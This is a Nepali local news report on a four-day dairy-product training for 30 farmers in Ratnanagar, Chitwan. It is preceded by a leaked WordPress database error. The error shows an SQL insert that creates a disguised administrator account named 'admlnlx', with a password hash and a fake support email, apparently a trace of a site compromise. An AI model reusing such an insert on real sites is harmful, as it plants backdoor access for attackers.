WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B7SQ/zUh1N/NIGrjTnKKGU0aIz1xZi0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-02 10:43:59', '', 'admlnlx', 'admlnlx')
चितवन, माघ ८–
रत्ननगरमा आयोजना गरिएको चार दिने दुधको परिकार बनाउने तालिम शनिबार सकिएको छ ।
राष्ट्रिय दुग्ध विकास बोर्डको प्राविधिक तथा रत्ननगर नगरपालिकाको आर्थिक सहयोगमा व्यवसायिक पशुपालक कृषक समाज नगर समन्वय समिति रत्ननगरले तालिमको आयोजना गरेको हो । ३० जना गाईपालन किसान सहभागि सो तालिममा मसला पनिर, पनिर, रसबरी, लालमोहन, गुतपाक र पुस्टकारी बनाउन सिकाईएको थियो ।
राष्ट्रिय दुग्ध विकास बोर्डका अनुसन्धान सहायक डा.रविन्द्र विलास मरहठ्ठाले तालिममा सहजीकरण गरेका थिए । समापन कार्यक्रमका प्रमुख अतिथि राष्ट्रिय दुग्ध विकास बोर्डका उपनिर्देशक बाबुकाजी पन्तले सहभागीहरुलाई प्रमाणपत्र वितरण गरेका थिए । कार्यक्रम समितिका अध्यक्ष किशोर बगाललेको अध्यक्षतामा भएको थियो ।